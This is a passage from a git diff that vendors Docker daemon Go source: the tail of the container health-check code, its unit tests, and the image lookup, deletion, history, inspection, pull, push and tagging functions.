error) { + b.mu.Lock() + defer b.mu.Unlock() + + bufLen := b.buf.Len() + dataLen := len(data) + keep := min(maxOutputLen-bufLen, dataLen) + if keep > 0 { + b.buf.Write(data[:keep]) + } + if keep < dataLen { + b.truncated = true + } + return dataLen, nil +} + +// The contents of the buffer, with "..." appended if it overflowed. +func (b *limitedBuffer) String() string { + b.mu.Lock() + defer b.mu.Unlock() + + out := b.buf.String() + if b.truncated { + out = out + "..." + } + return out +} + +// If configuredValue is zero, use defaultValue instead. +func timeoutWithDefault(configuredValue time.Duration, defaultValue time.Duration) time.Duration { + if configuredValue == 0 { + return defaultValue + } + return configuredValue +} + +func min(x, y int) int { + if x < y { + return x + } + return y +} + +func getShell(config *containertypes.Config) []string { + if len(config.Shell) != 0 { + return config.Shell + } + if runtime.GOOS != "windows" { + return []string{"/bin/sh", "-c"} + } + return []string{"cmd", "/S", "/C"} +} diff --git a/vendor/github.com/docker/docker/daemon/health_test.go b/vendor/github.com/docker/docker/daemon/health_test.go new file mode 100644 index 0000000000..7e82115d43 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/health_test.go @@ -0,0 +1,118 @@ +package daemon + +import ( + "testing" + "time" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/events" +) + +func reset(c *container.Container) { + c.State = &container.State{} + c.State.Health = &container.Health{} + c.State.Health.Status = types.Starting +} + +func TestNoneHealthcheck(t *testing.T) { + c := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", + Healthcheck: &containertypes.HealthConfig{ + Test: []string{"NONE"}, + }, + }, + State: &container.State{}, + }, + } + daemon := &Daemon{} + + daemon.initHealthMonitor(c) + if c.State.Health != nil { + t.Errorf("Expecting Health to be nil, but was not") + } +} + +func TestHealthStates(t *testing.T) { + e := events.New() + _, l, _ := e.Subscribe() + defer e.Evict(l) + + expect := func(expected string) { + select { + case event := <-l: + ev := event.(eventtypes.Message) + if ev.Status != expected { + t.Errorf("Expecting event %#v, but got %#v\n", expected, ev.Status) + } + case <-time.After(1 * time.Second): + t.Errorf("Expecting event %#v, but got nothing\n", expected) + } + } + + c := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", + }, + }, + } + daemon := &Daemon{ + EventsService: e, + } + + c.Config.Healthcheck = &containertypes.HealthConfig{ + Retries: 1, + } + + reset(c) + + handleResult := func(startTime time.Time, exitCode int) { + handleProbeResult(daemon, c, &types.HealthcheckResult{ + Start: startTime, + End: startTime, + ExitCode: exitCode, + }, nil) + } + + // starting -> failed -> success -> failed + + handleResult(c.State.StartedAt.Add(1*time.Second), 1) + expect("health_status: unhealthy") + + handleResult(c.State.StartedAt.Add(2*time.Second), 0) + expect("health_status: healthy") + + handleResult(c.State.StartedAt.Add(3*time.Second), 1) + expect("health_status: unhealthy") + + // Test retries + + reset(c) + c.Config.Healthcheck.Retries = 3 + + handleResult(c.State.StartedAt.Add(20*time.Second), 1) + handleResult(c.State.StartedAt.Add(40*time.Second), 1) + if c.State.Health.Status != types.Starting { + t.Errorf("Expecting starting, but got %#v\n", c.State.Health.Status) + } + if c.State.Health.FailingStreak != 2 { + t.Errorf("Expecting FailingStreak=2, but got %d\n", c.State.Health.FailingStreak) + } + handleResult(c.State.StartedAt.Add(60*time.Second), 1) + expect("health_status: unhealthy") + + handleResult(c.State.StartedAt.Add(80*time.Second), 0) + expect("health_status: healthy") + if c.State.Health.FailingStreak != 0 { + t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak) + } +} diff --git a/vendor/github.com/docker/docker/daemon/image.go b/vendor/github.com/docker/docker/daemon/image.go new file mode 100644 index 0000000000..32a8d77432 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image.go @@ -0,0 +1,76 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/builder" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" +) + +// ErrImageDoesNotExist is error returned when no image can be found for a reference. +type ErrImageDoesNotExist struct { + RefOrID string +} + +func (e ErrImageDoesNotExist) Error() string { + return fmt.Sprintf("no such id: %s", e.RefOrID) +} + +// GetImageID returns an image ID corresponding to the image referred to by +// refOrID. +func (daemon *Daemon) GetImageID(refOrID string) (image.ID, error) { + id, ref, err := reference.ParseIDOrReference(refOrID) + if err != nil { + return "", err + } + if id != "" { + if _, err := daemon.imageStore.Get(image.IDFromDigest(id)); err != nil { + return "", ErrImageDoesNotExist{refOrID} + } + return image.IDFromDigest(id), nil + } + + if id, err := daemon.referenceStore.Get(ref); err == nil { + return image.IDFromDigest(id), nil + } + + // deprecated: repo:shortid https://github.com/docker/docker/pull/799 + if tagged, ok := ref.(reference.NamedTagged); ok { + if tag := tagged.Tag(); stringid.IsShortID(stringid.TruncateID(tag)) { + if id, err := daemon.imageStore.Search(tag); err == nil { + for _, namedRef := range daemon.referenceStore.References(id.Digest()) { + if namedRef.Name() == ref.Name() { + return id, nil + } + } + } + } + } + + // Search based on ID + if id, err := daemon.imageStore.Search(refOrID); err == nil { + return id, nil + } + + return "", ErrImageDoesNotExist{refOrID} +} + +// GetImage returns an image corresponding to the image referred to by refOrID. +func (daemon *Daemon) GetImage(refOrID string) (*image.Image, error) { + imgID, err := daemon.GetImageID(refOrID) + if err != nil { + return nil, err + } + return daemon.imageStore.Get(imgID) +} + +// GetImageOnBuild looks up a Docker image referenced by `name`. +func (daemon *Daemon) GetImageOnBuild(name string) (builder.Image, error) { + img, err := daemon.GetImage(name) + if err != nil { + return nil, err + } + return img, nil +} diff --git a/vendor/github.com/docker/docker/daemon/image_delete.go b/vendor/github.com/docker/docker/daemon/image_delete.go new file mode 100644 index 0000000000..3e3c142e9c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_delete.go @@ -0,0 +1,412 @@ +package daemon + +import ( + "fmt" + "strings" + "time" + + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" +) + +type conflictType int + +const ( + conflictDependentChild conflictType = (1 << iota) + conflictRunningContainer + conflictActiveReference + conflictStoppedContainer + conflictHard = conflictDependentChild | conflictRunningContainer + conflictSoft = conflictActiveReference | conflictStoppedContainer +) + +// ImageDelete deletes the image referenced by the given imageRef from this +// daemon. The given imageRef can be an image ID, ID prefix, or a repository +// reference (with an optional tag or digest, defaulting to the tag name +// "latest"). There is differing behavior depending on whether the given +// imageRef is a repository reference or not. +// +// If the given imageRef is a repository reference then that repository +// reference will be removed. However, if there exists any containers which +// were created using the same image reference then the repository reference +// cannot be removed unless either there are other repository references to the +// same image or force is true. Following removal of the repository reference, +// the referenced image itself will attempt to be deleted as described below +// but quietly, meaning any image delete conflicts will cause the image to not +// be deleted and the conflict will not be reported. +// +// There may be conflicts preventing deletion of an image and these conflicts +// are divided into two categories grouped by their severity: +// +// Hard Conflict: +// - a pull or build using the image. +// - any descendant image. +// - any running container using the image. +// +// Soft Conflict: +// - any stopped container using the image. +// - any repository tag or digest references to the image. +// +// The image cannot be removed if there are any hard conflicts and can be +// removed if there are soft conflicts only if force is true. +// +// If prune is true, ancestor images will each attempt to be deleted quietly, +// meaning any delete conflicts will cause the image to not be deleted and the +// conflict will not be reported. +// +// FIXME: remove ImageDelete's dependency on Daemon, then move to the graph +// package. This would require that we no longer need the daemon to determine +// whether images are being used by a stopped or running container. +func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.ImageDelete, error) { + start := time.Now() + records := []types.ImageDelete{} + + imgID, err := daemon.GetImageID(imageRef) + if err != nil { + return nil, daemon.imageNotExistToErrcode(err) + } + + repoRefs := daemon.referenceStore.References(imgID.Digest()) + + var removedRepositoryRef bool + if !isImageIDPrefix(imgID.String(), imageRef) { + // A repository reference was given and should be removed + // first. We can only remove this reference if either force is + // true, there are multiple repository references to this + // image, or there are no containers using the given reference. + if !force && isSingleReference(repoRefs) { + if container := daemon.getContainerUsingImage(imgID); container != nil { + // If we removed the repository reference then + // this image would remain "dangling" and since + // we really want to avoid that the client must + // explicitly force its removal. + err := fmt.Errorf("conflict: unable to remove repository reference %q (must force) - container %s is using its referenced image %s", imageRef, stringid.TruncateID(container.ID), stringid.TruncateID(imgID.String())) + return nil, errors.NewRequestConflictError(err) + } + } + + parsedRef, err := reference.ParseNamed(imageRef) + if err != nil { + return nil, err + } + + parsedRef, err = daemon.removeImageRef(parsedRef) + if err != nil { + return nil, err + } + + untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + + daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + records = append(records, untaggedRecord) + + repoRefs = daemon.referenceStore.References(imgID.Digest()) + + // If a tag reference was removed and the only remaining + // references to the same repository are digest references, + // then clean up those digest references. + if _, isCanonical := parsedRef.(reference.Canonical); !isCanonical { + foundRepoTagRef := false + for _, repoRef := range repoRefs { + if _, repoRefIsCanonical := repoRef.(reference.Canonical); !repoRefIsCanonical && parsedRef.Name() == repoRef.Name() { + foundRepoTagRef = true + break + } + } + if !foundRepoTagRef { + // Remove canonical references from same repository + remainingRefs := []reference.Named{} + for _, repoRef := range repoRefs { + if _, repoRefIsCanonical := repoRef.(reference.Canonical); repoRefIsCanonical && parsedRef.Name() == repoRef.Name() { + if _, err := daemon.removeImageRef(repoRef); err != nil { + return records, err + } + + untaggedRecord := types.ImageDelete{Untagged: repoRef.String()} + records = append(records, untaggedRecord) + } else { + remainingRefs = append(remainingRefs, repoRef) + + } + } + repoRefs = remainingRefs + } + } + + // If it has remaining references then the untag finished the remove + if len(repoRefs) > 0 { + return records, nil + } + + removedRepositoryRef = true + } else { + // If an ID reference was given AND there is at most one tag + // reference to the image AND all references are within one + // repository, then remove all references. + if isSingleReference(repoRefs) { + c := conflictHard + if !force { + c |= conflictSoft &^ conflictActiveReference + } + if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil { + return nil, conflict + } + + for _, repoRef := range repoRefs { + parsedRef, err := daemon.removeImageRef(repoRef) + if err != nil { + return nil, err + } + + untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + + daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + records = append(records, untaggedRecord) + } + } + } + + if err := daemon.imageDeleteHelper(imgID, &records, force, prune, removedRepositoryRef); err != nil { + return nil, err + } + + imageActions.WithValues("delete").UpdateSince(start) + + return records, nil +} + +// isSingleReference returns true when all references are from one repository +// and there is at most one tag. Returns false for empty input. +func isSingleReference(repoRefs []reference.Named) bool { + if len(repoRefs) <= 1 { + return len(repoRefs) == 1 + } + var singleRef reference.Named + canonicalRefs := map[string]struct{}{} + for _, repoRef := range repoRefs { + if _, isCanonical := repoRef.(reference.Canonical); isCanonical { + canonicalRefs[repoRef.Name()] = struct{}{} + } else if singleRef == nil { + singleRef = repoRef + } else { + return false + } + } + if singleRef == nil { + // Just use first canonical ref + singleRef = repoRefs[0] + } + _, ok := canonicalRefs[singleRef.Name()] + return len(canonicalRefs) == 1 && ok +} + +// isImageIDPrefix returns whether the given possiblePrefix is a prefix of the +// given imageID. +func isImageIDPrefix(imageID, possiblePrefix string) bool { + if strings.HasPrefix(imageID, possiblePrefix) { + return true + } + + if i := strings.IndexRune(imageID, ':'); i >= 0 { + return strings.HasPrefix(imageID[i+1:], possiblePrefix) + } + + return false +} + +// getContainerUsingImage returns a container that was created using the given +// imageID. Returns nil if there is no such container. +func (daemon *Daemon) getContainerUsingImage(imageID image.ID) *container.Container { + return daemon.containers.First(func(c *container.Container) bool { + return c.ImageID == imageID + }) +} + +// removeImageRef attempts to parse and remove the given image reference from +// this daemon's store of repository tag/digest references. The given +// repositoryRef must not be an image ID but a repository name followed by an +// optional tag or digest reference. If tag or digest is omitted, the default +// tag is used. Returns the resolved image reference and an error. +func (daemon *Daemon) removeImageRef(ref reference.Named) (reference.Named, error) { + ref = reference.WithDefaultTag(ref) + // Ignore the boolean value returned, as far as we're concerned, this + // is an idempotent operation and it's okay if the reference didn't + // exist in the first place. + _, err := daemon.referenceStore.Delete(ref) + + return ref, err +} + +// removeAllReferencesToImageID attempts to remove every reference to the given +// imgID from this daemon's store of repository tag/digest references. Returns +// on the first encountered error. Removed references are logged to this +// daemon's event service. An "Untagged" types.ImageDelete is added to the +// given list of records. +func (daemon *Daemon) removeAllReferencesToImageID(imgID image.ID, records *[]types.ImageDelete) error { + imageRefs := daemon.referenceStore.References(imgID.Digest()) + + for _, imageRef := range imageRefs { + parsedRef, err := daemon.removeImageRef(imageRef) + if err != nil { + return err + } + + untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + + daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + *records = append(*records, untaggedRecord) + } + + return nil +} + +// ImageDeleteConflict holds a soft or hard conflict and an associated error. +// Implements the error interface. +type imageDeleteConflict struct { + hard bool + used bool + imgID image.ID + message string +} + +func (idc *imageDeleteConflict) Error() string { + var forceMsg string + if idc.hard { + forceMsg = "cannot be forced" + } else { + forceMsg = "must be forced" + } + + return fmt.Sprintf("conflict: unable to delete %s (%s) - %s", stringid.TruncateID(idc.imgID.String()), forceMsg, idc.message) +} + +// imageDeleteHelper attempts to delete the given image from this daemon. If +// the image has any hard delete conflicts (child images or running containers +// using the image) then it cannot be deleted. If the image has any soft delete +// conflicts (any tags/digests referencing the image or any stopped container +// using the image) then it can only be deleted if force is true. If the delete +// succeeds and prune is true, the parent images are also deleted if they do +// not have any soft or hard delete conflicts themselves. Any deleted images +// and untagged references are appended to the given records. If any error or +// conflict is encountered, it will be returned immediately without deleting +// the image. If quiet is true, any encountered conflicts will be ignored and +// the function will return nil immediately without deleting the image. +func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDelete, force, prune, quiet bool) error { + // First, determine if this image has any conflicts. Ignore soft conflicts + // if force is true. + c := conflictHard + if !force { + c |= conflictSoft + } + if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil { + if quiet && (!daemon.imageIsDangling(imgID) || conflict.used) { + // Ignore conflicts UNLESS the image is "dangling" or not being used in + // which case we want the user to know. + return nil + } + + // There was a conflict and it's either a hard conflict OR we are not + // forcing deletion on soft conflicts. + return conflict + } + + parent, err := daemon.imageStore.GetParent(imgID) + if err != nil { + // There may be no parent + parent = "" + } + + // Delete all repository tag/digest references to this image. + if err := daemon.removeAllReferencesToImageID(imgID, records); err != nil { + return err + } + + removedLayers, err := daemon.imageStore.Delete(imgID) + if err != nil { + return err + } + + daemon.LogImageEvent(imgID.String(), imgID.String(), "delete") + *records = append(*records, types.ImageDelete{Deleted: imgID.String()}) + for _, removedLayer := range removedLayers { + *records = append(*records, types.ImageDelete{Deleted: removedLayer.ChainID.String()}) + } + + if !prune || parent == "" { + return nil + } + + // We need to prune the parent image. This means delete it if there are + // no tags/digests referencing it and there are no containers using it ( + // either running or stopped). + // Do not force prunings, but do so quietly (stopping on any encountered + // conflicts). + return daemon.imageDeleteHelper(parent, records, false, true, true) +} + +// checkImageDeleteConflict determines whether there are any conflicts +// preventing deletion of the given image from this daemon. A hard conflict is +// any image which has the given image as a parent or any running container +// using the image. A soft conflict is any tags/digest referencing the given +// image or any stopped container using the image. If ignoreSoftConflicts is +// true, this function will not check for soft conflict conditions. +func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType) *imageDeleteConflict { + // Check if the image has any descendant images. + if mask&conflictDependentChild != 0 && len(daemon.imageStore.Children(imgID)) > 0 { + return &imageDeleteConflict{ + hard: true, + imgID: imgID, + message: "image has dependent child images", + } + } + + if mask&conflictRunningContainer != 0 { + // Check if any running container is using the image. + running := func(c *container.Container) bool { + return c.IsRunning() && c.ImageID == imgID + } + if container := daemon.containers.First(running); container != nil { + return &imageDeleteConflict{ + imgID: imgID, + hard: true, + used: true, + message: fmt.Sprintf("image is being used by running container %s", stringid.TruncateID(container.ID)), + } + } + } + + // Check if any repository tags/digest reference this image. + if mask&conflictActiveReference != 0 && len(daemon.referenceStore.References(imgID.Digest())) > 0 { + return &imageDeleteConflict{ + imgID: imgID, + message: "image is referenced in multiple repositories", + } + } + + if mask&conflictStoppedContainer != 0 { + // Check if any stopped containers reference this image. + stopped := func(c *container.Container) bool { + return !c.IsRunning() && c.ImageID == imgID + } + if container := daemon.containers.First(stopped); container != nil { + return &imageDeleteConflict{ + imgID: imgID, + used: true, + message: fmt.Sprintf("image is being used by stopped container %s", stringid.TruncateID(container.ID)), + } + } + } + + return nil +} + +// imageIsDangling returns whether the given image is "dangling" which means +// that there are no repository references to the given image and it has no +// child images. +func (daemon *Daemon) imageIsDangling(imgID image.ID) bool { + return !(len(daemon.referenceStore.References(imgID.Digest())) > 0 || len(daemon.imageStore.Children(imgID)) > 0) +} diff --git a/vendor/github.com/docker/docker/daemon/image_exporter.go b/vendor/github.com/docker/docker/daemon/image_exporter.go new file mode 100644 index 0000000000..95d1d3dcdb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_exporter.go @@ -0,0 +1,25 @@ +package daemon + +import ( + "io" + + "github.com/docker/docker/image/tarexport" +) + +// ExportImage exports a list of images to the given output stream. The +// exported images are archived into a tar when written to the output +// stream. All images with the given tag and all versions containing +// the same tag are exported. names is the set of tags to export, and +// outStream is the writer which the images are written to. +func (daemon *Daemon) ExportImage(names []string, outStream io.Writer) error { + imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon) + return imageExporter.Save(names, outStream) +} + +// LoadImage uploads a set of images into the repository. This is the +// complement of ImageExport. The input stream is an uncompressed tar +// ball containing images and metadata. +func (daemon *Daemon) LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error { + imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon) + return imageExporter.Load(inTar, outStream, quiet) +} diff --git a/vendor/github.com/docker/docker/daemon/image_history.go b/vendor/github.com/docker/docker/daemon/image_history.go new file mode 100644 index 0000000000..839dd1283b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_history.go @@ -0,0 +1,84 @@ +package daemon + +import ( + "fmt" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/layer" + "github.com/docker/docker/reference" +) + +// ImageHistory returns a slice of ImageHistory structures for the specified image +// name by walking the image lineage. +func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { + start := time.Now() + img, err := daemon.GetImage(name) + if err != nil { + return nil, err + } + + history := []*types.ImageHistory{} + + layerCounter := 0 + rootFS := *img.RootFS + rootFS.DiffIDs = nil + + for _, h := range img.History { + var layerSize int64 + + if !h.EmptyLayer { + if len(img.RootFS.DiffIDs) <= layerCounter { + return nil, fmt.Errorf("too many non-empty layers in History section") + } + + rootFS.Append(img.RootFS.DiffIDs[layerCounter]) + l, err := daemon.layerStore.Get(rootFS.ChainID()) + if err != nil { + return nil, err + } + layerSize, err = l.DiffSize() + layer.ReleaseAndLog(daemon.layerStore, l) + if err != nil { + return nil, err + } + + layerCounter++ + } + + history = append([]*types.ImageHistory{{ + ID: "", + Created: h.Created.Unix(), + CreatedBy: h.CreatedBy, + Comment: h.Comment, + Size: layerSize, + }}, history...) + } + + // Fill in image IDs and tags + histImg := img + id := img.ID() + for _, h := range history { + h.ID = id.String() + + var tags []string + for _, r := range daemon.referenceStore.References(id.Digest()) { + if _, ok := r.(reference.NamedTagged); ok { + tags = append(tags, r.String()) + } + } + + h.Tags = tags + + id = histImg.Parent + if id == "" { + break + } + histImg, err = daemon.GetImage(id.String()) + if err != nil { + break + } + } + imageActions.WithValues("history").UpdateSince(start) + return history, nil +} diff --git a/vendor/github.com/docker/docker/daemon/image_inspect.go b/vendor/github.com/docker/docker/daemon/image_inspect.go new file mode 100644 index 0000000000..ebf912469c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_inspect.go @@ -0,0 +1,82 @@ +package daemon + +import ( + "fmt" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/layer" + "github.com/docker/docker/reference" +) + +// LookupImage looks up an image by name and returns it as an ImageInspect +// structure. +func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) { + img, err := daemon.GetImage(name) + if err != nil { + return nil, fmt.Errorf("No such image: %s", name) + } + + refs := daemon.referenceStore.References(img.ID().Digest()) + repoTags := []string{} + repoDigests := []string{} + for _, ref := range refs { + switch ref.(type) { + case reference.NamedTagged: + repoTags = append(repoTags, ref.String()) + case reference.Canonical: + repoDigests = append(repoDigests, ref.String()) + } + } + + var size int64 + var layerMetadata map[string]string + layerID := img.RootFS.ChainID() + if layerID != "" { + l, err := daemon.layerStore.Get(layerID) + if err != nil { + return nil, err + } + defer layer.ReleaseAndLog(daemon.layerStore, l) + size, err = l.Size() + if err != nil { + return nil, err + } + + layerMetadata, err = l.Metadata() + if err != nil { + return nil, err + } + } + + comment := img.Comment + if len(comment) == 0 && len(img.History) > 0 { + comment = img.History[len(img.History)-1].Comment + } + + imageInspect := &types.ImageInspect{ + ID: img.ID().String(), + RepoTags: repoTags, + RepoDigests: repoDigests, + Parent: img.Parent.String(), + Comment: comment, + Created: img.Created.Format(time.RFC3339Nano), + Container: img.Container, + ContainerConfig: &img.ContainerConfig, + DockerVersion: img.DockerVersion, + Author: img.Author, + Config: img.Config, + Architecture: img.Architecture, + Os: img.OS, + OsVersion: img.OSVersion, + Size: size, + VirtualSize: size, // TODO: field unused, deprecate + RootFS: rootFSToAPIType(img.RootFS), + } + + imageInspect.GraphDriver.Name = daemon.GraphDriverName() + + imageInspect.GraphDriver.Data = layerMetadata + + return imageInspect, nil +} diff --git a/vendor/github.com/docker/docker/daemon/image_pull.go b/vendor/github.com/docker/docker/daemon/image_pull.go new file mode 100644 index 0000000000..2157d15974 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_pull.go @@ -0,0 +1,149 @@ +package daemon + +import ( + "io" + "strings" + + dist "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/builder" + "github.com/docker/docker/distribution" + progressutils "github.com/docker/docker/distribution/utils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +// PullImage initiates a pull operation. image is the repository name to pull, and +// tag may be either empty, or indicate a specific tag to pull. +func (daemon *Daemon) PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { + // Special case: "pull -a" may send an image name with a + // trailing :. This is ugly, but let's not break API + // compatibility. + image = strings.TrimSuffix(image, ":") + + ref, err := reference.ParseNamed(image) + if err != nil { + return err + } + + if tag != "" { + // The "tag" could actually be a digest. + var dgst digest.Digest + dgst, err = digest.ParseDigest(tag) + if err == nil { + ref, err = reference.WithDigest(reference.TrimNamed(ref), dgst) + } else { + ref, err = reference.WithTag(ref, tag) + } + if err != nil { + return err + } + } + + return daemon.pullImageWithReference(ctx, ref, metaHeaders, authConfig, outStream) +} + +// PullOnBuild tells Docker to pull image referenced by `name`. +func (daemon *Daemon) PullOnBuild(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer) (builder.Image, error) { + ref, err := reference.ParseNamed(name) + if err != nil { + return nil, err + } + ref = reference.WithDefaultTag(ref) + + pullRegistryAuth := &types.AuthConfig{} + if len(authConfigs) > 0 { + // The request came with a full auth config file, we prefer to use that + repoInfo, err := daemon.RegistryService.ResolveRepository(ref) + if err != nil { + return nil, err + } + + resolvedConfig := registry.ResolveAuthConfig( + authConfigs, + repoInfo.Index, + ) + pullRegistryAuth = &resolvedConfig + } + + if err := daemon.pullImageWithReference(ctx, ref, nil, pullRegistryAuth, output); err != nil { + return nil, err + } + return daemon.GetImage(name) +} + +func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference.Named, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { + // Include a buffer so that slow client connections don't affect + // transfer performance. + progressChan := make(chan progress.Progress, 100) + + writesDone := make(chan struct{}) + + ctx, cancelFunc := context.WithCancel(ctx) + + go func() { + progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan) + close(writesDone) + }() + + imagePullConfig := &distribution.ImagePullConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeaders, + AuthConfig: authConfig, + ProgressOutput: progress.ChanOutput(progressChan), + RegistryService: daemon.RegistryService, + ImageEventLogger: daemon.LogImageEvent, + MetadataStore: daemon.distributionMetadataStore, + ImageStore: distribution.NewImageConfigStoreFromStore(daemon.imageStore), + ReferenceStore: daemon.referenceStore, + }, + DownloadManager: daemon.downloadManager, + Schema2Types: distribution.ImageTypes, + } + + err := distribution.Pull(ctx, ref, imagePullConfig) + close(progressChan) + <-writesDone + return err +} + +// GetRepository returns a repository from the registry. +func (daemon *Daemon) GetRepository(ctx context.Context, ref reference.NamedTagged, authConfig *types.AuthConfig) (dist.Repository, bool, error) { + // get repository info + repoInfo, err := daemon.RegistryService.ResolveRepository(ref) + if err != nil { + return nil, false, err + } + // makes sure name is not empty or `scratch` + if err := distribution.ValidateRepoName(repoInfo.Name()); err != nil { + return nil, false, err + } + + // get endpoints + endpoints, err := daemon.RegistryService.LookupPullEndpoints(repoInfo.Hostname()) + if err != nil { + return nil, false, err + } + + // retrieve repository + var ( + confirmedV2 bool + repository dist.Repository + lastError error + ) + + for _, endpoint := range endpoints { + if endpoint.Version == registry.APIVersion1 { + continue + } + + repository, confirmedV2, lastError = distribution.NewV2Repository(ctx, repoInfo, endpoint, nil, authConfig, "pull") + if lastError == nil && confirmedV2 { + break + } + } + return repository, confirmedV2, lastError +} diff --git a/vendor/github.com/docker/docker/daemon/image_push.go b/vendor/github.com/docker/docker/daemon/image_push.go new file mode 100644 index 0000000000..e6382c7f27 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_push.go @@ -0,0 +1,63 @@ +package daemon + +import ( + "io" + + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/docker/api/types" + "github.com/docker/docker/distribution" + progressutils "github.com/docker/docker/distribution/utils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" + "golang.org/x/net/context" +) + +// PushImage initiates a push operation on the repository named localName. +func (daemon *Daemon) PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { + ref, err := reference.ParseNamed(image) + if err != nil { + return err + } + if tag != "" { + // Push by digest is not supported, so only tags are supported. + ref, err = reference.WithTag(ref, tag) + if err != nil { + return err + } + } + + // Include a buffer so that slow client connections don't affect + // transfer performance. + progressChan := make(chan progress.Progress, 100) + + writesDone := make(chan struct{}) + + ctx, cancelFunc := context.WithCancel(ctx) + + go func() { + progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan) + close(writesDone) + }() + + imagePushConfig := &distribution.ImagePushConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeaders, + AuthConfig: authConfig, + ProgressOutput: progress.ChanOutput(progressChan), + RegistryService: daemon.RegistryService, + ImageEventLogger: daemon.LogImageEvent, + MetadataStore: daemon.distributionMetadataStore, + ImageStore: distribution.NewImageConfigStoreFromStore(daemon.imageStore), + ReferenceStore: daemon.referenceStore, + }, + ConfigMediaType: schema2.MediaTypeImageConfig, + LayerStore: distribution.NewLayerProviderFromStore(daemon.layerStore), + TrustKey: daemon.trustKey, + UploadManager: daemon.uploadManager, + } + + err = distribution.Push(ctx, ref, imagePushConfig) + close(progressChan) + <-writesDone + return err +} diff --git a/vendor/github.com/docker/docker/daemon/image_tag.go b/vendor/github.com/docker/docker/daemon/image_tag.go new file mode 100644 index 0000000000..36fa3b462e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_tag.go @@ -0,0 +1,37 @@ +package daemon + +import ( + "github.com/docker/docker/image" + "github.com/docker/docker/reference" +) + +// TagImage creates the tag specified by newTag, pointing to the image named +// imageName (alternatively, imageName can also be an image ID). +func (daemon *Daemon) TagImage(imageName, repository, tag string) error { + imageID, err := daemon.GetImageID(imageName) + if err != nil { + return err + } + + newTag, err := reference.WithName(repository) + if err != nil { + return err + } + if tag != "" { + if newTag, err = reference.WithTag(newTag, tag); err != nil { + return err + } + } + + return daemon.TagImageWithReference(imageID, newTag) +} + +// TagImageWithReference adds the given reference to the image ID provided. +func (daemon *Daemon) TagImageWithReference(imageID image.ID, newTag reference.Named) error { + if err := daemon.referenceStore.AddTag(newTag, imageID.Digest(), true); err != nil { + return err + } + + daemon.LogImageEvent(imageID.String(), newTag.String(), "tag") + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/images.go b/vendor/github.com/docker/docker/daemon/images.go new file mode 100644 index 0000000000..88fb8f8e91 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images.go @@ -0,0 +1,331 @@ +package daemon + +import ( + "encoding/json" + "fmt" + "sort" + "time" + + "github.com/pkg/errors" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" +) + +var acceptedImageFilterTags = map[string]bool{ + "dangling": true, + "label": true, + "before": true, + "since": true, + "reference": true, +} + +// byCreated is a temporary type used to sort a list of images by creation +// time. +type byCreated []*types.ImageSummary + +func (r byCreated) Len() int { return len(r) } +func (r byCreated) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byCreated) Less(i, j int) bool { return r[i].Created < r[j].Created } + +// Map returns a map of all images in the ImageStore +func 